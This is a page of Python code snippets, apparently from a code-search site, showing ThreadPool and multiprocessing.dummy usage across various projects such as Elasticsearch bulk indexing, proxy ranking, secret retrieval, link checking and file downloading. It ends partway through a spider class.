コード例 #1
0
def simple_parallel():
    values = [[2, 3, 5], [5, 5, 5], [2], [3, 3]]
    pool = Pool(4)
    results = pool.map(sum, values)
    pool.close()  # closing the pool
    pool.join()  # waiting for the work to finish
    print results
コード例 #2
0
ファイル: classes.py プロジェクト: MarkoSh/APTester
    def createDemo(self):

        usersData = []
        event = Event()
        pool = ThreadPool(multiprocessing.cpu_count() * 2)
        pool = ThreadPool(5)

        for i in range(0, 1000):
            string = hashlib.sha224()
            string.update('{}'.format(random.random()))
            first = 'first{}'.format(string.hexdigest()[0:10])
            string.update('{}'.format(random.random()))
            last = 'last{}'.format(string.hexdigest()[0:10])
            tel = '{}'.format(8005550000 + i)
            email = 'email{}@localhost.email'.format(string.hexdigest()[0:10])
            postData = {
                    'first': first,
                    'last': last,
                    'tel': tel,
                    'email': email,
                    'pass': '******',
                    'type': 'customer',
                    'event': event
                }
            usersData.append(postData)


        results = pool.map(self.createUser, usersData)
        pool.close()
        pool.join()
コード例 #3
0
ファイル: helpers.py プロジェクト: NoobSkywalker/eve-elastic
def parallel_bulk(client, actions, thread_count=4, chunk_size=500,
        max_chunk_bytes=100 * 1014 * 1024,
        expand_action_callback=expand_action, **kwargs):
    """
    Parallel version of the bulk helper run in multiple threads at once.
    :arg client: instance of :class:`~elasticsearch.Elasticsearch` to use
    :arg actions: iterator containing the actions
    :arg thread_count: size of the threadpool to use for the bulk requests
    :arg chunk_size: number of docs in one chunk sent to es (default: 500)
    :arg max_chunk_bytes: the maximum size of the request in bytes (default: 100MB)
    :arg raise_on_error: raise ``BulkIndexError`` containing errors (as `.errors`)
        from the execution of the last chunk when some occur. By default we raise.
    :arg raise_on_exception: if ``False`` then don't propagate exceptions from
        call to ``bulk`` and just report the items that failed as failed.
    :arg expand_action_callback: callback executed on each action passed in,
        should return a tuple containing the action line and the data line
        (`None` if data line should be omitted).
    """
    # Avoid importing multiprocessing unless parallel_bulk is used
    # to avoid exceptions on restricted environments like App Engine
    from multiprocessing.dummy import Pool
    actions = map(expand_action_callback, actions)

    pool = Pool(thread_count)

    for result in pool.imap(
        lambda chunk: list(_process_bulk_chunk(client, chunk, **kwargs)),
        _chunk_actions(actions, chunk_size, max_chunk_bytes, client.transport.serializer)
    ):
        for item in result:
            yield item

    pool.close()
    pool.join()
コード例 #4
0
ファイル: agent.py プロジェクト: hit-suit/MNIST
def check_and_rank_ip(session):
    def ping_jd(ip):
        t = time.time()
        try:
            respond = requests.post('http://so.m.jd.com/ware/searchList.action',
                                    data={'_format_': 'json', 'stock': 1, 'page': 1, 'keyword': '手机'},
                                    proxies=ip.to_proxy(), timeout=5).content
            json.loads(respond)
            ip.rank = int(100 * (time.time() - t))
        except Exception:
            ip.rank = None
        return ip

    print datetime.now(), '开始判断ip活性'
    from multiprocessing.dummy import Pool as ThreadPool
    all_ip = session.query(IP).all()
    pool = ThreadPool(100)
    ips = pool.map(ping_jd, all_ip)
    for ip in ips:
        session.add(ip)
    session.query(IP).filter(IP.rank == None).delete()
    session.commit()
    pool.close()
    pool.join()
    return session.query(IP).count()
コード例 #5
0
ファイル: perf_test.py プロジェクト: Tribushkov/tech-db-api
    def run():
        t = [
            ('users', User().create),
            ('forums', Forum().create),
            ('threads', Thread().create),
            ('posts', Post().create),
            ("followers", User().follow),
            ("subscribptions", Thread().subscribe),
        ]

        for entity, factory in t:
            entities = [True for i in range(int(settings[entity]))]
            num_tasks = len(entities)
            pool = ThreadPool(int(settings['num_threads']))
            try:
                progress = range(5, 105, 5)
                for i, _ in enumerate(pool.imap(factory, entities)):
                    perc = i * 100 / num_tasks
                    if perc % 5 == 0 and perc in progress: 
                        log.print_out('Creating %s: %d%% done' % (entity, perc))
                        progress.remove(perc)
                pool.close()
                pool.join()
            except Exception, e:
                print e
                pool.terminate()
                sys.exit(1)
コード例 #6
0
ファイル: crysadm_helper.py プロジェクト: qq898232/crysadm
def get_offline_user_data():
    if DEBUG_MODE:
        print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'get_offline_user_data')
    if r_session.exists('api_error_info'):
        return

    if datetime.now().minute < 50:
        return

    offline_users = []
    for b_user in r_session.mget(*['user:%s' % name.decode('utf-8') for name in r_session.sdiff('users', *r_session.smembers('global:online.users'))]):
        user_info = json.loads(b_user.decode('utf-8'))

        username = user_info.get('username')

        if not user_info.get('active'): continue

        every_hour_key = 'user:%s:cron_queued' % username
        if r_session.exists(every_hour_key): continue

        offline_users.append(username)

    pool = ThreadPool(processes=5)

    pool.map(get_data, offline_users)
    pool.close()
    pool.join()
コード例 #7
0
def main():
    dfbToken = raw_input('Enter your Dropbox Business API App token (Team Member File Access permission): ')

    if args.verbose:
        dumpArguments()

    global fileQuota
    fileQuota = args.quota * UNITS[args.units]

    log("Creating Dropbox V2 API Client")
    global dbxApiV2
    dbxApiV2 = DbxApi(DbxApi.DBX_API_V2, dfbToken)

    log("Collecting Member List...")
    members = getDfbMembers(None)
    # Filter out invited members as they can't consume any quota yet
    activeMembers = [member for member in members if member.status != "invited"]
    log("Got {} total team members ({} active, {} suspended, {} invited)"
        .format(
                len(members), len(activeMembers),
                len(getMemberSublist(members, "suspended")),
                len(getMemberSublist(members, "invited"))
                ))

    log("Collecting file quota information - this may take a while...")
    pool = ThreadPool(args.threads)
    members = pool.map(getFileQuotaUsage, activeMembers)
    pool.close()
    pool.join()

    # Write final output
    log("Processing complete, writing output to {}".format(args.output.name))
    dumpCsvFile(members)
コード例 #8
0
def load_rowdata_to_mongo_zh(is_incremental):
    print("start loading row data(zh) from JSON file to MongoDB...")
    all_start = timeit.default_timer()
    static = Static()
    bydim_dir = static.output_folder + static.dataset_bydim_folder
    
    client = MongoClient(static.mongo_url, static.mongo_port)
    db = client[static.database_name]
    dataset_col = db[static.dataset_col_name]
    if not is_incremental:
        dataset_col.drop()

    file_path_array = []
    for idx, file in enumerate(os.listdir(bydim_dir)):
        file_path = os.path.join(bydim_dir, file)
        if os.path.isfile(file_path):
            file_path_array.append(file_path)
    print(str(len(file_path_array)) + " files are loaded")

    counter = []
    mapfunc = partial(insert_by_dim, counter=counter, dataset_col=dataset_col, all_start=all_start)
    pool = ThreadPool(12)
    pool.map(mapfunc, file_path_array)
    pool.close() 
    pool.join()
    
    print("All the threads are completed. Total number is " + str(len(counter)) + "\n")
    print("total time cost: " + str(round(timeit.default_timer() - all_start)) + 's')
コード例 #9
0
def run(threads):
    urls = ['http://www.python.org',
    	'http://www.python.org/about/',
    	'http://www.onlamp.com/pub/a/python/2003/04/17/metaclasses.html',
    	'http://www.python.org/doc/',
    	'http://www.python.org/download/',
    	'http://www.python.org/getit/',
    	'http://www.python.org/community/',
    	'https://wiki.python.org/moin/',
    	'http://planet.python.org/',
    	'https://wiki.python.org/moin/LocalUserGroups',
    	'http://www.python.org/psf/',
    	'http://docs.python.org/devguide/',
    	'http://www.python.org/community/awards/'
         ]
    results = []
    scontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
    
    requests = [urllib.request.Request(url=url,data=b'None',
                headers={'User-Agent':' Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0'})
                for url in urls]
    pool = ThreadPool(threads)    
    results = list(pool.map(lambda x: urllib.request.urlopen(x, context=scontext), requests))
    pool.close()
    pool.join()

    dataLen = [len(result.read().decode('utf-8')) for result in results]
    print(threads, 'поток(ов), прочитано', sum(dataLen), 'байт')
コード例 #10
0
def parse_films_infomation(item):
    title = item[0]
    title_deal = ''.join(title.split('*'))

    title_deal=''.join(title_deal.split('/'))
    title_deal=''.join(title_deal.split(':'))

    os.mkdir(title_deal)
    os.chdir(title_deal)
    film_info = item[1]
    with open('film_tag.txt', 'w+', encoding='utf-8') as file:
        for i in film_info:
            file.write(i)

    magnent_container = item[3]
    with open('magnent.txt', 'w+', encoding='utf-8') as file2:
        for per_list in magnent_container:
            strings = ''.join(i + '   ' for i in per_list)
            file2.write(strings + '\n')

    # os.mkdir('sample_img')
    # os.chdir('sample_img')

    film_pic_url = item[2]
    sample_images_urls = item[4]

    # print(type(sample_images_urls))

    # 设置线程池
    child_pool = ThreadPool(12)
    result = child_pool.map(download, sample_images_urls)
    # print('下载完成')
    child_pool.close()
    child_pool.join()
    os.chdir('../')
コード例 #11
0
ファイル: tasks.py プロジェクト: likun01/trushwho_wechat
def build_words_weight():
    st = time.time()
    bigvs = BigVs.objects.all()
    def _build(b):
        data = ArticlePostedResults.active_objects.filter(bigv__v_id=b.v_id, is_correct__in=(0, 1)).values('is_correct').annotate(count=Count('is_correct')).order_by('is_correct')
        sum_c , w, c = 0, 0, 0
        for d in data:
            if d['is_correct'] == 1:
                c = d['count']
            sum_c += d['count']
        if sum_c:
            w = c * 1.0 / sum_c
            c = w * 200
            sum_c = 200
        data = Judgement.objects.filter(article__bigv=b, judge__isnull=False).values('judge').annotate(count=Count('judge')).order_by('judge')
        for d in data:
            if d['judge'] == 'right':
                c += d['count']
            sum_c += d['count']
        if sum_c:
            w = int(round(c * 1.0 / sum_c * 100))
            b.words_weight = w
            b.save()
            print b.name, c, sum_c, w
    pool = Pool(8)
    pool.map(_build, bigvs)
    pool.close()
    pool.join()
    ed = time.time()
    debug('build_words_weight', ed - st)
コード例 #12
0
ファイル: test_graphkit.py プロジェクト: yahoo/graphkit
def test_multi_threading():
    import time
    import random
    from multiprocessing.dummy import Pool

    def op_a(a, b):
        time.sleep(random.random()*.02)
        return a+b

    def op_b(c, b):
        time.sleep(random.random()*.02)
        return c+b

    def op_c(a, b):
        time.sleep(random.random()*.02)
        return a*b

    pipeline = compose(name="pipeline", merge=True)(
        operation(name="op_a", needs=['a', 'b'], provides='c')(op_a),
        operation(name="op_b", needs=['c', 'b'], provides='d')(op_b),
        operation(name="op_c", needs=['a', 'b'], provides='e')(op_c),
    )

    def infer(i):
        # data = open("616039-bradpitt.jpg").read()
        outputs = ["c", "d", "e"]
        results = pipeline({"a": 1, "b":2}, outputs)
        assert tuple(sorted(results.keys())) == tuple(sorted(outputs)), (outputs, results)
        return results

    N = 100
    for i in range(20, 200):
        pool = Pool(i)
        pool.map(infer, range(N))
        pool.close()
コード例 #13
0
ファイル: docs_loader.py プロジェクト: grow/grow
    def load(cls, docs, ignore_errors=False):
        """Force load the provided docs to read from file system."""
        if not docs:
            return

        pod = docs[0].pod

        def load_func(doc):
            """Force the doc to read the source file."""
            try:
                # pylint: disable=pointless-statement
                doc.has_serving_path()  # Using doc fields forces file read.
            except document_front_matter.BadFormatError:
                if not ignore_errors:
                    raise

        with pod.profile.timer('DocsLoader.load'):
            if ThreadPool is None or len(docs) < cls.MIN_POOL_COUNT:
                for doc in docs:
                    load_func(doc)
                return
            pool_size = min(cls.MAX_POOL_SIZE, len(docs) * cls.POOL_RATIO)
            pool_size = int(round(pool_size))
            thread_pool = ThreadPool(pool_size)
            results = thread_pool.imap_unordered(load_func, docs)
            # Loop results to make sure that the threads are all processed.
            for _ in results:
                pass
            thread_pool.close()
            thread_pool.join()
コード例 #14
0
ファイル: example3.py プロジェクト: togear/tools
def Producer():
#    urls = [
#            'http://www.python.org', 
#            'http://www.python.org/about/',
#            'http://www.onlamp.com/pub/a/python/2003/04/17/metaclasses.html',
#            'http://www.python.org/doc/',
#            'http://www.python.org/download/',
#            'http://www.python.org/getit/',
#            'http://www.python.org/community/',
#            'https://wiki.python.org/moin/',
#            'http://planet.python.org/',
#            'https://wiki.python.org/moin/LocalUserGroups',
#            'http://www.python.org/psf/',
#            'http://docs.python.org/devguide/',
#            'http://www.python.org/community/awards/'
#            # etc.. 
#            ]

#            'http://wwww.qq.com','http://www.baidu.com'
    urls = [
            'http://www.taobao.com','http://www.sina.com.cn'
            ]

    start_time = time.time()
    # Make the Pool of workers
    pool = ThreadPool(4) 
    # Open the urls in their own threads
    # and return the results
    results = pool.map(urllib2.urlopen, urls)
    #close the pool and wait for the work to finish 
    pool.close() 
    pool.join()

    print "Done! time Taken()",format(time.time()-start_time)
コード例 #15
0
ファイル: crysadm_helper.py プロジェクト: sykiewang/crysadm
def collect_crystal():
    print(datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'collect_crystal')
    pool = ThreadPool(processes=5)

    pool.map(check_collect, (json.loads(c.decode('utf-8')) for c in r_session.smembers('global:auto.collect.cookies')))
    pool.close()    
    pool.join()
コード例 #16
0
ファイル: EvalAnalysis.py プロジェクト: UrbanDiver/Poker2
def create_all_preflop_two_hand_equity(verbose=False, save=False, distributed=False, nb_process=4):
	"""returns preflop_two_hand_equity for all two hand preflop combinations"""
	global all_preflop_two_hands

	print '\n--------------- start create_all_preflop_two_hand_equity'
	print 'all preflop two hands = \nstart = {}\nend = {}\nnb of elements = {}'.format(all_preflop_two_hands[:5], all_preflop_two_hands[-5:], len(all_preflop_two_hands))

	t0 = timer()

	if (distributed):
		pool = ThreadPool(nb_process)
		equity = pool.map(preflop_two_hand_equity, all_preflop_two_hands[:])
		pool.close()
		pool.join()
	else:
		equity = []
		for k, p in enumerate(all_preflop_two_hands[:]):
			if (verbose):
				# print k,' - ', p
				sys.stdout.write('\rk=%5d / %5d : {}' % (k+1, len(all_preflop_two_hands)), p)
				sys.stdout.flush()
			equity.append(preflop_two_hand_equity(p))

	t1 = timer()
	print 'all_preflop_two_hand_equity time = {:9.4f} s'.format(t1-t0)
	print 'exact number of distinct (rankwise) pairs of preflop hands = {}'.format(np.array([len(e) for e in equity]).sum())
	if (save):
		cPickle.dump(equity, open(os.path.join('Tables', 'all_preflop_two_hand_equity.pk'), 'wb'))
		print '{} saved to disk as {}'.format('equity', os.path.join('Tables', 'all_preflop_two_hand_equity.pk'))
	return equity
コード例 #17
0
def make_unaligned_fasta(dnaDirectory, groupsDict):
    """ Reads through files in provided directory to find gene sequences that
    match the proteins in the groups dictionary"""
    print "Collecting core genes"
    def make_fasta(group):
        proteins = groupsDict[group]
        out = open('proteinAlignments/' + group + '.fasta', 'w')
        records = []
        seqIDs = []
        for protein in proteins:
            seqID = protein.split('|')[0]
            seqIDs.append(seqID)
            protein = protein.split('|')[1]
            records.append(seqRecordDict[protein])
        SeqIO.write(records, out, 'fasta')
        return seqIDs

    try:
        os.makedirs("proteinAlignments")
    except OSError:
        if not os.path.isdir("proteinAlignments"):
            raise
    files = listdir_fullpath(dnaDirectory)
    seqRecordDict = {}
    seqIDs = []
    for f in files:
        handle = open(f, 'r')
        for record in SeqIO.parse(handle, 'fasta'):
            seqRecordDict[record.id] = record
    pool = ThreadPool(args.threads)
    seqIDs = pool.map(make_fasta, groupsDict.keys())
    pool.close()
    pool.join()
    return seqIDs[0]
コード例 #18
0
def simTrans(hosts, prm):
	fname = str(prm.n) + 'nodes.' + str(prm.data_size) + 'MB.' + str(prm.pipes) + 'pipes.out'
	for h in hosts:
		full_name = "results/%04d/%s"%(int(h.name.split('h')[1]), fname)
		os.system("rm %s" % full_name)
		status[h.name] = [0 for i in range(prm.pipes)]
		ip[h.name] = h.IP()
		h.cmdPrint('iperf -s -f M >> %s &'%full_name)
	'''for h1 in hosts:
		for h2 in hosts:
			if h1 == h2:
				continue
			print "Testing %s and %s after running server" % (h1.name, h2.name)
			net.iperf( (h1, h2) )
	'''
	print neib
	status['h1'] = [2 for i in range(prm.pipes)]	#start node
	print status
	k = []
	for h in hosts:
		k.append((h, prm))
	pool = ThreadPool(50)
	pool.map(perNodeProc, k)
	pool.close()
	pool.join()

	for h in hosts:
		h.cmdPrint('kill %iperf')
コード例 #19
0
ファイル: scrape_projects.py プロジェクト: mansam/fossbox
def grab_everything():
    node_links = grab_blog_node_links()
    pool = ThreadPool(cpu_count())
    results = pool.map(grab_blog_content, node_links)
    pool.close()
    pool.join()
    return results
コード例 #20
0
ファイル: nrkdl.py プロジェクト: esp0/nrkdl
def _download_all(items):
    """Async download of the files.

       Example: [(url, quality, file_path)]

    """

    global WORKERS
    # Don't start more workers then 1:1
    if WORKERS < len(items):
        WORKERS = len(items)

    pool = ThreadPool(WORKERS)
    chunks = 1  # TODO
    # 1 ffmpeg is normally 10x- 20x * 2500kbits ish
    # so depending on how many items you download and
    # your bandwidth you might need to tweak chunk

    results = pool.imap_unordered(dl, items, chunks)
    try:
        for j in tqdm.tqdm(results, total=len(items)):
            pass
    finally:
        pool.close()
        pool.join()
コード例 #21
0
def dns_resolver(filename, dst="mail.txt"):
    try:
        fd = open(filename, 'r')
    except:
        print 'can not open the file:', filename
        return

    try:
        fd_write = open(dst,'w')
    except:
        print 'error in open',dst
        return 

    thread_num = 2
    pool = ThreadPool(thread_num)
    results = pool.map(verify_domain,fd.readlines())
    pool.close()
    pool.join()
    results = list(set(results))
    results = [item for item in results if item]
    

    for line in results:
        fd_write(line)

    fd_write.close()
コード例 #22
0
ファイル: checklinks.py プロジェクト: colutti/LinksChecker
def main():
    parser = argparse.ArgumentParser(description='Checks a LegalOne application for broken links')
    parser.add_argument('-d', '--domain',
                        help='URL to check for broken links. Ex. http://colucci.release.dco.novajus.com.br',
                        required=True)
    parser.add_argument("-e", '--escritorio',
                        help='Account to check for broken links, Ex. xxxx, where xxx.release.dco.novajus.com.br',
                        required=True)
    parser.add_argument("-l", '--loginpage',
                        help='URL to login on the application. Ex. http://release.dco.novajus.com.br/conta/login',
                        required=True)
    parser.add_argument("-t", '--threads',
                        type=int,
                        help='How many threads sarching for broken links at the same time. Default is 10',
                        required=False, default=10)
    args = parser.parse_args()
    loginpage = args.loginpage
    escritorio = args.escritorio
    domain = args.domain
    threads = args.threads
    pages_to_test = queue.Queue(maxsize=0)
    cookie_login = login(domain, escritorio, loginpage)
    pages_to_test.put(domain + "/contatos/contatos/search")
    test_url(cookie_login, pages_to_test, domain, pages_to_test.get())
    while not pages_to_test.empty():
        pool = ThreadPool(threads)
        links_to_check = []
        for x in range(0, threads):
            links_to_check.append(pages_to_test.get())
        partialtest_url = partial(test_url, cookie_login, pages_to_test, domain)
        pool.map(partialtest_url, links_to_check)
        pool.close()
        pool.join()
コード例 #23
0
def main():
    parser = argparse.ArgumentParser(usage='%(prog)s [options] SERVER_URL',
                                     description=__doc__)
    parser.add_argument(
        '-t', '--threads',
        help='Number of threads (simultaneous connections)',
        dest='threads', default=1, type=int)
    parser.add_argument('server', help='URL of server')
    args = parser.parse_args()

    server = args.server

    if not server.startswith('http://'):
        server = 'http://{}'.format(server)

    icons = []
    for font_id, font in fonts.items():
        for char in font['characters']:
            url = os.path.join(server, 'icon', font_id, '000', char)
            icons.append((font_id, char, url))

    icons.sort()

    print('{} icons to test on {} ...'.format(len(icons), args.server))

    if MAX_ICONS:
        icons = icons[:MAX_ICONS]

    pool = Pool(args.threads)
    pool.map(check_icon, icons)
    pool.close()
    pool.join()
コード例 #24
0
ファイル: ePy_MC.py プロジェクト: taotheadmin/ePy_Bench
def e_cal(l, cores):
    global LOOPS
    '''
    e calculator
    this function will recive digits of float
    and calculate and print status during working.
    
    This function will return value of e.
    '''
    p = Pool()
    getcontext().prec = l
    e = Decimal(0)
    i = 0
    temp = 0
    c = 0
    while True:
        fact = p.map(math.factorial, range(i, i+cores)) #parallel process factorial
        e += sum(p.map(one_div, fact)) #processed factorial will total in here
        i += cores
        c += 1
        LOOPS += 1
        sys.stdout.write("\r%i loops passed." % (c) ) #Print Loop status
        sys.stdout.flush()
        #print i, "loops passed."
        if e == temp:
            break
        temp = e
    sys.stdout.write("\r%i loops passed.\n" % (c) )
    print i
    p.close()
    p.join()

    return e
コード例 #25
0
ファイル: block-ip.py プロジェクト: rlemm-juniper/block-ip
def multiRunuser():
    pool = ThreadPool(cpu_count() * 8)
    global ip_list
    global results
    results = pool.map_async(runuser, ip_list)
    pool.close()
    pool.join()
コード例 #26
0
ファイル: credstash.py プロジェクト: fugue/credstash
def getAllSecrets(version="", region=None, table="credential-store",
                  context=None, credential=None, session=None, **kwargs):
    '''
    fetch and decrypt all secrets
    '''
    if session is None:
        session = get_session(**kwargs)
    dynamodb = session.resource('dynamodb', region_name=region)
    kms = session.client('kms', region_name=region)
    secrets = listSecrets(region, table, **kwargs)

    # Only return the secrets that match the pattern in `credential`
    # This already works out of the box with the CLI get action,
    # but that action doesn't support wildcards when using as library
    if credential and WILDCARD_CHAR in credential:
        names = set(expand_wildcard(credential,
                                    [x["name"]
                                     for x in secrets]))
    else:
        names = set(x["name"] for x in secrets)

    pool = ThreadPool(min(len(names), THREAD_POOL_MAX_SIZE))
    results = pool.map(
        lambda credential: getSecret(credential, version, region, table, context, dynamodb, kms, **kwargs),
        names)
    pool.close()
    pool.join()
    return dict(zip(names, results))
コード例 #27
0
ファイル: eval_duration.py プロジェクト: dyan0123/Utils
def eval_dir(fn, files_list):
	pool = ThreadPool(WORKER_NUM)
	results = pool.map(fn, files_list)
	# close the pool and wait for the work to finish
	pool.close()
	pool.join()
	return sum(results)
コード例 #28
0
ファイル: proxy.py プロジェクト: bubble1229/proxy_pool
 def get_proxy(self):
     self._parse_proxy()
     pool = ThreadPool(8)
     pool.map(self._check_proxy, self.proxies)
     pool.close()
     pool.join()
     return self.checked_proxies
コード例 #29
0
ファイル: is_proxy_ok.py プロジェクト: shengqi158/is_proxy_ok
def get_proxys(file_name, thread_num=5):
    """这里的文件内容可以是从cn-proxy.com复制过来的数据"""
    proxys = []
    ip_reg = re.compile(r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', re.I)
    try:
        with open(file_name, 'r') as fd_proxy:
            for line in fd_proxy:
                if line and line.strip():
                    print 'line',line.strip()
                    if ip_reg.match(line.strip()):
                        ip, port = line.strip().split()[0], line.strip().split()[1]
                        proxy = '%s:%s' %(ip, port)
                        print 'proxy',proxy
#                        if test_connection(proxy):
                        if proxy:
                            proxys.append(proxy)
        pool = ThreadPool(thread_num)
        results = pool.map(test_connection,proxys)
        pool.close()
        pool.join()
        
        proxys = list(set(results))
        proxys = sorted(proxys,key=lambda x:x.split(".")[0])
    
    except Exception,e:
        print 'error',e
コード例 #30
0
def parallel_runner(args):
    pool = ThreadPool(args.parallel)
    map_args = map(lambda f: (args, f), args.file)
    result = pool.map(run_cmd, map_args)
    pool.close()
    pool.join()
    print result
コード例 #31
0
def make_unaln_files (search_dir, best_extension, cutoff,
                      dbpath, outdir, outext, force=False,
                      index_type="sfetch",
                      threads=2,multi=False):
    orthologs = {}
    dbidx = ""
    index_type = index_type.lower()
    if index_type == "cdbfasta":
        dbidx = dbpath + CDBYANKEXT
    elif index_type == "sfetch":
        dbidx = dbpath + SFETCHEXT

    if not os.path.exists(outdir):
        os.makedirs(outdir)

    if not os.path.exists(dbidx):
        print("No dbidx %s exists for reading" % (dbidx))
        return -1

    for file in os.listdir(search_dir):

        if file.endswith("."+best_extension):
            with open(os.path.join(search_dir,file),"r") as fh:
                for line in fh:
                    row = line.strip().split("\t")
                    HMMname = row.pop(0) # take first col as HMM name

                    if best_extension == "best":
                        if float(row[1]) <= float(cutoff):
                            if HMMname in orthologs:
                                orthologs[HMMname].append(row[0])
                            else:
                                orthologs[HMMname] = [ row[0] ]
                    elif best_extension == "best_multi":
                        if not multi:
                            row = [ row[0] ]

                        for hit in row:
                            hit_dat = hit.split(",")

                            if HMMname in orthologs:
                                orthologs[HMMname].append(hit_dat[0])
                            else:
                                orthologs[HMMname] = [ hit_dat[0] ]

    pool = ThreadPool(threads)
    fileset = []
    for orth in orthologs:
        outfile = "%s.%s" % (os.path.join(outdir,orth),outext)
        if force or (not os.path.exists(outfile)):
            if len(orthologs[orth]) >= Min_taxa:
                fileset.append( [dbpath, outfile,"\n".join(orthologs[orth]) + "\n"])

    if index_type == "cdbfasta":
        results = pool.map(run_cdbyank, fileset)
    elif index_type == "sfetch":
        results = pool.map(run_sfetch, fileset)

    # close the pool and wait for the work to finish
    pool.close()
    pool.join()
コード例 #32
0
        run_result = automata_run_stat(atm=atm, file_path=input_path[uat], cycle_detail=True, report_detail=False, bytes_per_dim=1)
        real_final.append(run_result[total_reports])
        appr_run_result = automata_run_stat(atm=appr_automata, file_path=input_path[uat], cycle_detail=True, report_detail=False, bytes_per_dim=1,
                                       translation_dic=translation_dic)
        approximate_final.append(appr_run_result[total_reports])

        with open(str(uat) + '.ttxt', "a") as f:
            print >> f, "real reports: " + str(real_final[-1])
            print >> f, "approximate reports: " + str(approximate_final[-1])
            print >> f, "real nodes count: " + str(atm.nodes_count)
            print >> f, "approximate nodes count:" + str(appr_automata.nodes_count)
            print >>f, "----------------------------------------------------------------"


    with open(str(uat) + '.ttxt', "a") as f:
        print >>f, "***************sum*******************"
        print >>f, "real reports: " + str(sum(real_final))
        print >>f, "approximate reports: " + str(sum(approximate_final))
        print >>f, "real nodes count: " + str(real_states)
        print >>f, "approximate nodes count:" + str(appr_states)

if __name__ == '__main__':

    ds = [a for a in AnmalZoo]
    thread_count = 8

    t_pool = ThreadPool(thread_count)
    results = t_pool.map(process_single_ds, ds)
    t_pool.close()
    t_pool.join()
コード例 #33
0
    # Get a Virtual Network context by Name
    print('\n====> Get a Virtual Network Context by Name: {}'.format(vnname))
    print(json.dumps(dnac.get_virtual_network_by_name(vnname), indent=2))

    # Get a Virtual Network context by Id
    vnid = dnac.get_virtual_network_id(vnname)
    print('\n====> Get a Virtual Network Context by Id: {}'.format(vnid, vnname))
    print(json.dumps(dnac.get_virtual_network_by_id(vnid), indent=2))

    # Delete a Virtual Network context
    print('\n==== Deleting Virtual Network: {} ===='.format(vnname))
    response = dnac.delete_virtual_network_by_name(vnname, asynch=False)
    print(json.dumps(response, indent=2))

    # Get a Virtual Network context ID given its name
    vnname = 'INFRA_VN'
    print('\n====> Get a Virtual Network Context ID given its name:')
    print('Virtual Network context Name: {}'.format(vnname))
    print('Virtual Network context ID: {}'.format(dnac.get_virtual_network_id(vnname)))

    # Multi-threading
    pool = Pool(4)
    thread_timeout = 8640
    operations = []
    operations.append((dnac.exists_virtual_network, {'vn_name': vnname}))
    data = pool.map_async(utils.run_workers, operations).get(thread_timeout)
    pool.close()
    pool.join()
    print(data)
コード例 #34
0
ファイル: bsdiff_chunk.py プロジェクト: sorphin/main
    def diff(self, from_file, to_file, out_file, log_file):
        """
            Split binaries in chunks, diff each chunk and generate a file with
            all chunks (binary patch, compressed or empty)
        """

        out_dir = os.path.dirname(out_file)

        try:
            os.stat(out_dir)
        except:
            os.mkdir(out_dir)

        with open(to_file, 'rb') as t, open(from_file, 'rb') as f:

            from_mmap = mmap.mmap(f.fileno(), 0, prot=mmap.PROT_READ)
            to_mmap = mmap.mmap(t.fileno(), 0, prot=mmap.PROT_READ)

            from_len = from_mmap.size()
            assert from_len != 0

            to_len = to_mmap.size()
            assert to_len != 0

            from_hash = sha256(from_mmap).digest()
            to_hash = sha256(to_mmap).digest()

            assert from_hash != to_hash

            from_list = list(self._chunk(from_mmap))
            to_list = list(self._chunk(to_mmap))

            if self.verbose:
                print "Using %d threads" % (self.threads)

            pool = ThreadPool(multiprocessing.cpu_count())

            oss = list()
            tss = list()
            xxx = list()

            for x in range(0, len(to_list)):

                try:
                    o = from_list[x]
                except IndexError:
                    o = list()

                try:
                    t = to_list[x]
                except IndexError:
                    t = list()

                oss.append(o)
                tss.append(t)
                xxx.append(x)

            results = pool.map(self._diff_with_exception, zip(oss, tss, xxx))
            pool.close()
            pool.join()

            out_fd = open(out_file, "wb")
            total_bytes = 0

            patch_information = {}
            patch_information["chunks"] = {}

            for result in results:
                patch_information["chunks"]["%d" % result.get("_id")] = result
                if result["_type"] > CHUNK_TYPE_KEEP:
                    in_fd = open(
                        "%s/%s" % (self.temp_directory, result['_name']), "rb")
                    in_buffer = mmap.mmap(in_fd.fileno(),
                                          0,
                                          prot=mmap.PROT_READ)
                    total_bytes += result['size_output']
                    out_fd.write(in_buffer)
                    in_buffer.close()
                    in_fd.close()

            to_file_data = open(to_file, "rb").read()
            to_file_len = len(to_file_data)
            to_file_compressed_len = len(LZG().compress(to_file_data))

            to_file_crc = binascii.crc32(to_file_data)

            patch_information.update({
                "chunk_size":
                self.chunk_size,
                "_name":
                os.path.basename(out_file),
                "size":
                total_bytes,
                "size_patch":
                total_bytes,
                "size_compressed":
                to_file_compressed_len,
                "size_original":
                to_file_len,
                "crc":
                "0x%x" % (to_file_crc & 0xffffffff),
                "gain_vs_original":
                to_file_len - total_bytes,
                "gain_vs_compressed":
                to_file_compressed_len - total_bytes,
                "ratio_vs_original":
                "%0.5f" % (1.0 * total_bytes / to_file_len),
                "ratio_vs_compressed":
                "%0.5f" % (1.0 * total_bytes / to_file_compressed_len),
            })

            if to_file_compressed_len <= total_bytes:
                patch_information["_name"] = os.path.basename(to_file)
                patch_information["size"] = to_file_compressed_len
                patch_information[
                    "gain_vs_original"] = to_file_len - to_file_compressed_len
                patch_information["gain_vs_compressed"] = 0
                patch_information["ratio_vs_original"] = "%0.5f" % \
                    (1.0 *
                     to_file_compressed_len /
                     to_file_len)
                patch_information["ratio_vs_compressed"] = 1
                use_patch = False
            else:
                use_patch = True

            with open(log_file, 'w') as f:
                f.write(json.dumps(patch_information, indent=4,
                                   sort_keys=True))

            if self.verbose:
                print json.dumps(patch_information, indent=4, sort_keys=True)

            return use_patch, patch_information
コード例 #35
0
ファイル: spider.py プロジェクト: aipyth/scrapping
class BaseSpider:
    """
    Basic simple spider

    Right in class you can specify such arguments:
        urls - list of str urls.

        data_handlers - list of data handlers. The data from parsing function goes right there.

        workers - number of workers in the Pool.

    You can overload such functions:
        parse(self, request, html) - parse data here. This method accepts scrapping.requests.Request and bs4.BeautifulSoup arguments.

        get_requests(self) - if you don't have prepared urls to parse find them here and return as scrapping.requests.Request object. Other data types would be ignored.
    """
    workers = 5
    urls = []
    data_handlers = []
    name = None

    def __init__(self, urls=None, name=None, workers=None, data_handlers=None):
        self.urls = urls if urls else self.urls
        self.workers = workers if workers else self.workers
